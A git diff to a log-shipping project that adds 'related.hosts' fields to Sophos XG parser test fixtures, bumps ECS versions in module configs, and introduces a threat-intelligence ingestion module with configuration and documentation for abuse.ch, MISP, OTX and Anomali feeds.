b/x-pack/filebeat/module/sophos/xg/test/anti-spam.log-expected.json index a78e3c1ccb0d..044a0b01f339 100644 --- a/x-pack/filebeat/module/sophos/xg/test/anti-spam.log-expected.json +++ b/x-pack/filebeat/module/sophos/xg/test/anti-spam.log-expected.json @@ -32,6 +32,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "server.bytes": 0, "server.port": 0, "service.type": "sophos", @@ -104,6 +107,9 @@ "observer.serial_number": "1234567890123457", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "some_other_host.local" + ], "server.bytes": 0, "server.ip": "185.8.209.194", "server.port": 25, @@ -192,6 +198,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "server.bytes": 0, "server.ip": "185.8.209.194", "server.port": 25, @@ -280,6 +289,9 @@ "observer.serial_number": "1234567890123457", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "some_other_host.local" + ], "server.bytes": 0, "server.ip": "185.8.209.194", "server.port": 25, @@ -355,6 +367,9 @@ "observer.serial_number": "C44313350024-P29PUA", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "server.bytes": 0, "server.ip": "10.198.233.61", "server.port": 25, @@ -423,6 +438,9 @@ "observer.serial_number": "S4000806149EE49", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "server.bytes": 0, "server.ip": "10.198.234.240", "server.port": 25, @@ -491,6 +509,9 @@ "observer.serial_number": "S4000806149EE49", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "server.bytes": 0, "server.ip": "10.198.17.121", "server.port": 25, @@ -557,6 +578,9 @@ "observer.serial_number": "S4000806149EE49", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "server.bytes": 0, "server.ip": "10.198.16.204", "server.port": 25, @@ -624,6 +648,9 @@ "observer.serial_number": "S4000806149EE49", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "server.bytes": 0, "server.ip": "10.198.17.121", "server.port": 25, @@ -688,6 +715,9 @@ "observer.serial_number": "S4000806149EE49", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "server.bytes": 0, "server.ip": "10.198.17.121", "server.port": 25, @@ -755,6 +785,9 @@ "observer.serial_number": "C44313350024-P29PUA", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "server.bytes": 0, "server.ip": "10.198.233.61", "server.port": 110, diff --git a/x-pack/filebeat/module/sophos/xg/test/anti-virus.log-expected.json b/x-pack/filebeat/module/sophos/xg/test/anti-virus.log-expected.json index 42590edbb335..65b2d6abdfdd 100644 --- a/x-pack/filebeat/module/sophos/xg/test/anti-virus.log-expected.json +++ b/x-pack/filebeat/module/sophos/xg/test/anti-virus.log-expected.json @@ -46,6 +46,9 @@ "observer.serial_number": "1234567890123457", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "some_other_host.local" + ], "related.ip": [ "172.16.34.24", "13.226.155.93" @@ -124,6 +127,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "related.ip": [ "172.16.34.24", "13.226.155.18" @@ -199,6 +205,9 @@ "observer.serial_number": "1234567890123457", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "some_other_host.local" + ], "related.ip": [ "82.165.194.211", "186.8.209.194" @@ -284,6 +293,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "related.ip": [ "23.254.247.78", "185.7.209.194" @@ -365,6 +377,9 @@ "observer.serial_number": "S4000806149EE49", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "related.ip": [ "10.198.16.121", "10.198.234.240" @@ -436,6 +451,9 @@ "observer.serial_number": "S4000806149EE49", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "related.ip": [ "10.198.16.121", "10.198.234.240" @@ -509,6 +527,9 @@ "observer.serial_number": "SFDemo-2df0960", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "related.ip": [ "10.146.13.49", "10.8.142.181" @@ -574,6 +595,9 @@ "observer.serial_number": "SFDemo-2df0960", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "related.ip": [ "10.146.13.49", "10.8.142.181" diff --git a/x-pack/filebeat/module/sophos/xg/test/atp.log-expected.json b/x-pack/filebeat/module/sophos/xg/test/atp.log-expected.json index 38c2694478e7..a0230cb1dc49 100644 --- a/x-pack/filebeat/module/sophos/xg/test/atp.log-expected.json +++ b/x-pack/filebeat/module/sophos/xg/test/atp.log-expected.json @@ -40,6 +40,9 @@ "observer.serial_number": "C44310050024-P29PUA", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "related.ip": [ "10.198.47.71", "46.161.30.47" @@ -112,6 +115,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "related.ip": [ "172.16.34.24", "13.226.155.22" @@ -180,6 +186,9 @@ "observer.serial_number": "1234567890123457", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "some_other_host.local" + ], "related.ip": [ "172.16.34.24", "13.226.155.22" @@ -245,6 +254,9 @@ "observer.serial_number": "C30006T22TGR89B", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "related.ip": [ "10.198.32.89", "82.211.30.202" diff --git a/x-pack/filebeat/module/sophos/xg/test/cfilter.log-expected.json b/x-pack/filebeat/module/sophos/xg/test/cfilter.log-expected.json index 84dc15e1aeb7..c8bb6001058b 100644 --- a/x-pack/filebeat/module/sophos/xg/test/cfilter.log-expected.json +++ b/x-pack/filebeat/module/sophos/xg/test/cfilter.log-expected.json @@ -38,6 +38,9 @@ "observer.serial_number": "C44310050024-P29PUA", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "related.ip": [ "10.198.47.71", "182.79.221.19" @@ -114,6 +117,9 @@ "observer.serial_number": "S110000E28BA631", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "related.ip": [ "5.5.5.15", "216.58.197.44" @@ -189,6 +195,9 @@ "observer.serial_number": "S110016E28BA631", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "related.ip": [ "5.5.5.15", "74.125.130.188" @@ -270,6 +279,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "related.ip": [ "172.17.34.10", "13.79.168.201" @@ -344,6 +356,9 @@ "observer.serial_number": "1234567890123457", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "some_other_host.local" + ], "related.ip": [ "172.16.34.15", "40.90.137.127" @@ -416,6 +431,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "related.ip": [ "172.17.34.15", "91.228.167.133" @@ -471,6 +489,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "related.ip": [ "10.108.108.49" ], @@ -537,6 +558,9 @@ "observer.serial_number": "C01001K234RXPA1", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "related.ip": [ "192.168.73.220", "64.233.189.147" @@ -609,6 +633,9 @@ "observer.serial_number": "C01001K234RXPA1", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "related.ip": [ "192.168.73.220", "64.233.188.94" diff --git a/x-pack/filebeat/module/sophos/xg/test/event.log-expected.json b/x-pack/filebeat/module/sophos/xg/test/event.log-expected.json index 89d6878ec6f5..a237d2d2a362 100644 --- a/x-pack/filebeat/module/sophos/xg/test/event.log-expected.json +++ b/x-pack/filebeat/module/sophos/xg/test/event.log-expected.json @@ -27,6 +27,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "related.ip": [ "172.17.35.116" ], @@ -50,7 +53,8 @@ "tags": [ "sophos-xg", "forwarded" - ] + ], + "user.name": "elastic.user@elastic.test.com" }, { "@timestamp": "2020-05-18T14:38:58.000-02:00", @@ -80,6 +84,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "related.ip": [ "83.20.132.250", "214.167.51.66" @@ -137,6 +144,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "service.type": "sophos", "sophos.xg.connectiontype": "0", "sophos.xg.device": "SFW", @@ -180,6 +190,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "related.ip": [ "83.9.140.96" ], @@ -211,7 +224,8 @@ "tags": [ "sophos-xg", "forwarded" - ] + ], + "user.name": "elastic.user@elastic.test.com" }, { "@timestamp": "2020-05-18T14:39:01.000-02:00", @@ -239,6 +253,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "service.type": "sophos", "sophos.xg.device": "SFW", "sophos.xg.device_name": "XG230", @@ -274,6 +291,9 @@ "observer.serial_number": "1234567890123457", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "some_other_host.local" + ], "service.type": "sophos", "sophos.xg.device": "SFW", "sophos.xg.device_name": "XG230", @@ -318,6 +338,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "related.ip": [ "217.250.157.135" ], @@ -349,7 +372,8 @@ "tags": [ "sophos-xg", "forwarded" - ] + ], + "user.name": "elastic.user@elastic.test.com" }, { "@timestamp": "2020-05-18T14:39:04.000-02:00", @@ -372,6 +396,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "related.user": [ "elastic.user@elastic.test.com" ], @@ -420,6 +447,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "related.ip": [ "91.67.201.4" ], @@ -452,7 +482,8 @@ "tags": [ "sophos-xg", "forwarded" - ] + ], + "user.name": "hendrikl" }, { "@timestamp": "2020-05-18T14:39:06.000-02:00", @@ -473,6 +504,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "service.type": "sophos", "sophos.xg.device": "SFW", "sophos.xg.device_name": "XG230", @@ -510,6 +544,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "related.ip": [ "172.66.35.15" ], @@ -556,6 +593,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "service.type": "sophos", "sophos.xg.device": "SFW", "sophos.xg.device_name": "XG230", @@ -591,6 +631,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "service.type": "sophos", "sophos.xg.backup_mode": "'appliance' ", "sophos.xg.device": "SFW", @@ -637,6 +680,9 @@ "observer.serial_number": "1234567890123457", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "some_other_host.local" + ], "related.ip": [ "10.84.234.38" ], @@ -663,7 +709,8 @@ "tags": [ "sophos-xg", "forwarded" - ] + ], + "user.name": "elastic.user@elastic.test.com" }, { "@timestamp": "2018-06-06T11:12:10.000-02:00", @@ -684,6 +731,9 @@ "observer.serial_number": "S4000806149EE49", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "service.type": "sophos", "sophos.xg.device": "SFW", "sophos.xg.device_name": "SG430", diff --git a/x-pack/filebeat/module/sophos/xg/test/firewall.log-expected.json b/x-pack/filebeat/module/sophos/xg/test/firewall.log-expected.json index 7f1e5d9190be..35557e557da9 100644 --- a/x-pack/filebeat/module/sophos/xg/test/firewall.log-expected.json +++ b/x-pack/filebeat/module/sophos/xg/test/firewall.log-expected.json @@ -60,6 +60,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "related.ip": [ "172.17.34.15", "91.228.167.86", @@ -174,6 +177,9 @@ "observer.serial_number": "1234567890123457", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "some_other_host.local" + ], "related.ip": [ "172.16.66.155", "91.228.165.117", @@ -276,6 +282,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "related.ip": [ "172.17.35.113", "172.20.4.52" @@ -359,6 +368,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "related.ip": [ "10.82.234.6", "192.168.0.1" @@ -453,6 +465,9 @@ "observer.serial_number": "1234567890123457", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "some_other_host.local" + ], "related.ip": [ "51.77.56.9", "185.7.209.207" @@ -547,6 +562,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "related.ip": [ "172.17.35.101", "192.168.5.11" @@ -636,6 +654,9 @@ "observer.serial_number": "1234567890123457", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "some_other_host.local" + ], "related.ip": [ "172.16.36.105", "10.84.234.14" @@ -718,6 +739,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "related.ip": [ "10.82.234.9", "10.82.234.11" @@ -805,6 +829,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "related.ip": [ "10.84.234.7", "172.16.34.50" @@ -896,6 +923,9 @@ "observer.serial_number": "1234567890123457", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "some_other_host.local" + ], "related.ip": [ "192.168.1.254", "172.17.32.19" @@ -983,6 +1013,9 @@ "observer.serial_number": "1234567890123457", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "some_other_host.local" + ], "related.ip": [ "172.17.35.119", "172.16.34.10" @@ -1074,6 +1107,9 @@ "observer.serial_number": "SFDemo-763180a", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "related.ip": [ "10.198.32.19", "8.8.8.8" @@ -1154,8 +1190,10 @@ "observer.serial_number": "SFDemo-763180a", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "related.ip": [ - "0.0.0.0", "0.0.0.0" ], "rule.id": "0", @@ -1235,6 +1273,9 @@ "observer.serial_number": "SFDemo-763180a", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "related.ip": [ "10.198.38.184", "10.198.39.255" @@ -1318,6 +1359,9 @@ "observer.serial_number": "SFDemo-763180a", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "related.ip": [ "10.198.32.19", "10.198.32.48" @@ -1396,6 +1440,9 @@ "observer.serial_number": "SFDemo-763180a", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "related.ip": [ "10.198.37.23", "10.198.36.48" @@ -1483,6 +1530,9 @@ "observer.serial_number": "SFDemo-763180a", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "related.ip": [ "10.198.12.19", "8.8.8.8" @@ -1564,6 +1614,9 @@ "observer.serial_number": "SFDemo-763180a", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "related.ip": [ "fe80::59f5:3ce8:c98e:5062", "ff02::1:2" @@ -1644,6 +1697,9 @@ "observer.serial_number": "SFDemo-9a04c43", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "related.ip": [ "10.198.37.57", "10.198.32.19" @@ -1736,6 +1792,9 @@ "observer.serial_number": "SFDemo-9a04c43", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "related.ip": [ "10.198.37.57", "72.163.4.185" diff --git a/x-pack/filebeat/module/sophos/xg/test/idp.log-expected.json b/x-pack/filebeat/module/sophos/xg/test/idp.log-expected.json index d92a2b2e7e41..2dcaffd634e3 100644 --- a/x-pack/filebeat/module/sophos/xg/test/idp.log-expected.json +++ b/x-pack/filebeat/module/sophos/xg/test/idp.log-expected.json @@ -32,6 +32,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "related.ip": [ "89.40.182.58", "172.16.68.20" @@ -104,6 +107,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "related.ip": [ "117.50.11.192", "172.16.66.155" @@ -178,6 +184,9 @@ "observer.serial_number": "1234567890123457", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "some_other_host.local" + ], "related.ip": [ "77.61.185.101", "172.16.68.20" @@ -250,6 +259,9 @@ "observer.serial_number": "SFDemo-f64dd6be", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "related.ip": [ "10.0.0.168", "10.1.1.234" @@ -315,6 +327,9 @@ "observer.serial_number": "SFDemo-f64dd6be", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "related.ip": [ "10.0.1.31", "10.1.0.115" diff --git a/x-pack/filebeat/module/sophos/xg/test/sandbox.log-expected.json b/x-pack/filebeat/module/sophos/xg/test/sandbox.log-expected.json index ed32ee3f2132..acae45ad376e 100644 --- a/x-pack/filebeat/module/sophos/xg/test/sandbox.log-expected.json +++ b/x-pack/filebeat/module/sophos/xg/test/sandbox.log-expected.json @@ -28,6 +28,9 @@ "observer.serial_number": "C44310050024-P29PUA", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "service.type": "sophos", "sophos.xg.device": "SFW", "sophos.xg.device_name": "CR750iNG-XP", @@ -77,6 +80,9 @@ "related.hash": [ "83cd339302bf5e8ed5240ca6383418089c337a81" ], + "related.hosts": [ + "firewall.localgroup.local" + ], "related.ip": [ "10.198.47.112" ], @@ -130,6 +136,9 @@ "observer.serial_number": "C44313350024-P29PUA", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "service.type": "sophos", "sophos.xg.device": "SFW", "sophos.xg.device_name": "CR750iNG-XP", @@ -178,6 +187,9 @@ "related.hash": [ "3ce799580908df9ca0dc649aa8c2d06ab267e8c8" ], + "related.hosts": [ + "firewall.localgroup.local" + ], "related.ip": [ "10.198.47.112" ], @@ -237,6 +249,9 @@ "related.hash": [ "3ce799580908df9ca0dc649aa8c2d06ab267e8c8" ], + "related.hosts": [ + "firewall.localgroup.local" + ], "related.ip": [ "10.198.47.112" ], @@ -296,6 +311,9 @@ "related.hash": [ "d910c4a81122c360fe57f67a04999425a65249db" ], + "related.hosts": [ + "firewall.localgroup.local" + ], "related.ip": [ "172.16.34.24" ], diff --git a/x-pack/filebeat/module/sophos/xg/test/waf.log-expected.json b/x-pack/filebeat/module/sophos/xg/test/waf.log-expected.json index ceed76baef16..9a3920dc1689 100644 --- a/x-pack/filebeat/module/sophos/xg/test/waf.log-expected.json +++ b/x-pack/filebeat/module/sophos/xg/test/waf.log-expected.json @@ -42,6 +42,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "related.ip": [ "89.68.140.204", "185.8.209.207" @@ -123,6 +126,9 @@ "observer.serial_number": "1234567890123457", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "some_other_host.local" + ], "related.ip": [ "89.68.140.204", "185.8.209.207" @@ -196,6 +202,9 @@ "observer.serial_number": "1234567890123457", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "some_other_host.local" + ], "related.ip": [ "10.198.235.254", "10.198.233.48" @@ -264,6 +273,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "related.ip": [ "10.198.235.254", "10.198.233.48" @@ -339,6 +351,9 @@ "observer.serial_number": "1234567890123457", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "some_other_host.local" + ], "related.ip": [ "83.97.20.30", "216.167.51.72" diff --git a/x-pack/filebeat/module/sophos/xg/test/wifi.log-expected.json b/x-pack/filebeat/module/sophos/xg/test/wifi.log-expected.json index 64aa8a24494e..0568deab20f2 100644 --- a/x-pack/filebeat/module/sophos/xg/test/wifi.log-expected.json +++ b/x-pack/filebeat/module/sophos/xg/test/wifi.log-expected.json @@ -18,6 +18,9 @@ "observer.serial_number": "S110016E28BA631", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "service.type": "sophos", "sophos.xg.ap": "A40024A636F7862", "sophos.xg.clients_conn_ssid": "2", @@ -53,6 +56,9 @@ "observer.serial_number": "S110016E28BA631", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "service.type": "sophos", "sophos.xg.ap": "A40024A636F7862", "sophos.xg.clients_conn_ssid": "3", diff --git a/x-pack/filebeat/module/squid/log/config/input.yml b/x-pack/filebeat/module/squid/log/config/input.yml index c7baa2772dca..16d64b095c6b 100644 --- a/x-pack/filebeat/module/squid/log/config/input.yml +++ b/x-pack/filebeat/module/squid/log/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/suricata/eve/config/eve.yml b/x-pack/filebeat/module/suricata/eve/config/eve.yml index 8ce699299833..bac91dff1d79 100644 --- a/x-pack/filebeat/module/suricata/eve/config/eve.yml +++ b/x-pack/filebeat/module/suricata/eve/config/eve.yml @@ -58,4 +58,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/threatintel/_meta/config.yml b/x-pack/filebeat/module/threatintel/_meta/config.yml new file mode 100644 index 000000000000..9ee88db47ed7 --- /dev/null +++ b/x-pack/filebeat/module/threatintel/_meta/config.yml @@ -0,0 +1,94 @@ +- module: threatintel + abuseurl: + enabled: true + + # Input used for ingesting threat intel data. + var.input: httpjson + + # The URL used for Threat Intel API calls. + var.url: https://urlhaus-api.abuse.ch/v1/urls/recent/ + + # The interval to poll the API for updates. + var.interval: 60m + + abusemalware: + enabled: true + + # Input used for ingesting threat intel data. + var.input: httpjson + + # The URL used for Threat Intel API calls. + var.url: https://urlhaus-api.abuse.ch/v1/payloads/recent/ + + # The interval to poll the API for updates. + var.interval: 60m + + misp: + enabled: true + + # Input used for ingesting threat intel data, defaults to JSON. + var.input: httpjson + + # The URL of the MISP instance, should end with "/events/restSearch". + var.url: https://SERVER/events/restSearch + + # The authentication token used to contact the MISP API. Found when looking at user account in the MISP UI. + var.api_token: API_KEY + + # Optional filters that can be applied to the API for filtering out results. This should support the majority of fields in a MISP context. + # For examples please reference the filebeat module documentation. + #var.filters: + # - threat_level: [4, 5] + # - to_ids: true + + # How far back to look once the beat starts up for the first time, the value has to be in hours. Each request afterwards will filter on any event newer + # than the last event that was already ingested. + var.first_interval: 24h + + # The interval to poll the API for updates. + var.interval: 60m + + otx: + enabled: true + + # Input used for ingesting threat intel data + var.input: httpjson + + # The URL used for OTX Threat Intel API calls. + var.url: https://otx.alienvault.com/api/v1/indicators/export + + # The authentication token used to contact the OTX API, can be found on the OTX UI. + var.api_token: API_KEY + + # Optional filters that can be applied to retrieve only specific indicators. + #var.types: "domain,IPv4,hostname,url,FileHash-SHA256" + + # How many hours to look back for each request, should be close to the configured interval. Deduplication of events is handled by the module. + var.lookback_range: 2h + + # How far back to look once the beat starts up for the first time, the value has to be in hours. + var.first_interval: 24h + + # The interval to poll the API for updates + var.interval: 60m + + anomali: + enabled: true + + # Input used for ingesting threat intel data + var.input: httpjson + + # The URL used for Threat Intel API calls. + var.url: https://limo.anomali.com/api/v1/taxii2/feeds/collections/41/objects + + # The Username used by anomali Limo, defaults to guest. + #var.username: guest + + # The password used by anomali Limo, defaults to guest. + #var.password: guest + + # How far back to look once the beat starts up for the first time, the value has to be in hours. + var.first_interval: 24h + + # The interval to poll the API for updates + var.interval: 60m diff --git a/x-pack/filebeat/module/threatintel/_meta/docs.asciidoc b/x-pack/filebeat/module/threatintel/_meta/docs.asciidoc new file mode 100644 index 000000000000..b6711a419dcc --- /dev/null +++ b/x-pack/filebeat/module/threatintel/_meta/docs.asciidoc @@ -0,0 +1,301 @@ +[role="xpack"] + +:modulename: threatintel +:has-dashboards: false + + +== Threat Intel module +beta[] + +This module is a collection of different threat intelligence sources. The ingested data is meant to be used with [Indicator Match rules]https://www.elastic.co/guide/en/security/7.11/rules-ui-create.html#create-indicator-rule, but is also +compatible with other features like [Enrich Processors]https://www.elastic.co/guide/en/elasticsearch/reference/current/enrich-processor.html. +The related threat intel attribute that is meant to be used for matching incoming source data is stored under the `threatintel.indicator.*` fields. + +Currently supporting: +- `abuseurl` fileset: Supports URL entities from Abuse.ch +- `abusemalware` fileset: Supports Malware/Payload entities from Abuse.ch +- `misp` fileset: Supports gathering threat intel attributes from MISP +- `otx` fileset: Supports gathering threat intel attributes from Alienvault OTX +- `anomali` fileset: Supports gathering threat intel attributes from Anomali + +include::../include/gs-link.asciidoc[] + + +[float] +==== `abuseurl` fileset settings + +This fileset contacts the AbuseCH API and fetches all new malicious URLs found the last 60 minutes. + +To configure the module, please utilize the default URL unless specified as the example below: + +[source,yaml] +---- +- module: threatintel + abuseurl: + enabled: true + var.input: httpjson + var.url: https://urlhaus-api.abuse.ch/v1/urls/recent/ + var.interval: 60m +---- + +include::../include/var-paths.asciidoc[] + +*`var.url`*:: + +The URL of the API endpoint to connect with. + +*`var.interval`*:: + +How often the API is polled for updated information. + +AbuseCH URL Threat Intel is mapped to the following ECS fields +[options="header"] +|============================================================== +| URL Threat Intel Fields' | ECS Fields | +| url | threat.indicator.url.full | +| date_added | @timestamp | +| host | threat.indicator.ip/domain | +|============================================================== + +[float] +==== `abusemalware` fileset settings + +This fileset contacts the AbuseCH API and fetches all new malicious hashes found the last 60 minutes. + +To configure the module, please utilize the default URL unless specified as the example below: + +[source,yaml] +---- +- module: threatintel + abusemalware: + enabled: true + var.input: httpjson + var.url: https://urlhaus-api.abuse.ch/v1/payloads/recent/ + var.interval: 60m +---- + +include::../include/var-paths.asciidoc[] + +*`var.url`*:: + +The URL of the API endpoint to connect with. + +*`var.interval`*:: + +How often the API is polled for updated information. + +AbuseCH Malware Threat Intel is mapped to the following ECS fields +[options="header"] +|================================================================ +| Malware Threat IntelFields | ECS Fields | +| md5_hash | threat.indicato.file.hash.md5 | +| sha256_hash | threat.indicator.file.hash.sha256| +| file_size | threat.indicator.file.size | +|================================================================ + +[float] +==== `misp` fileset settings + +This fileset communicates with a local or remote MISP server. Not to be confused with the older MISP Module (link here). + +The fileset configuration allows to set the polling interval, how far back it should look initially, and optionally any filters used to filter the results. + +[source,yaml] +---- +- module: threatintel + misp: + enabled: true + var.input: httpjson + var.url: https://SERVER/events/restSearch + var.api_token: xVfaM3DSt8QEwO2J1ix00V4ZHJs14nq5GMsHcK6Z + var.initial_interval: 24h + var.interval: 60m +---- + +To configure the output with filters, use fields that already exist on the MISP server, and define either a single value or multiple. +By adding a filter, only events that has attributes which matches the filter will be returned. + +The below filters is only examples, for a full list of all fields please reference the MISP fields located on the MISP server itself. + +[source,yaml] +---- +- module: threatintel + misp: + enabled: true + var.input: httpjson + var.url: https://SERVER/events/restSearch + var.api_token: xVfaM3DSt8QEwO2J1ix00V4ZHJs14nq5GMsHcK6Z + var.filters: + - type: ["md5", "sha256", "url", "ip-src"] + - threat_level: 4 + var.initial_interval: 24h + var.interval: 60m +---- + 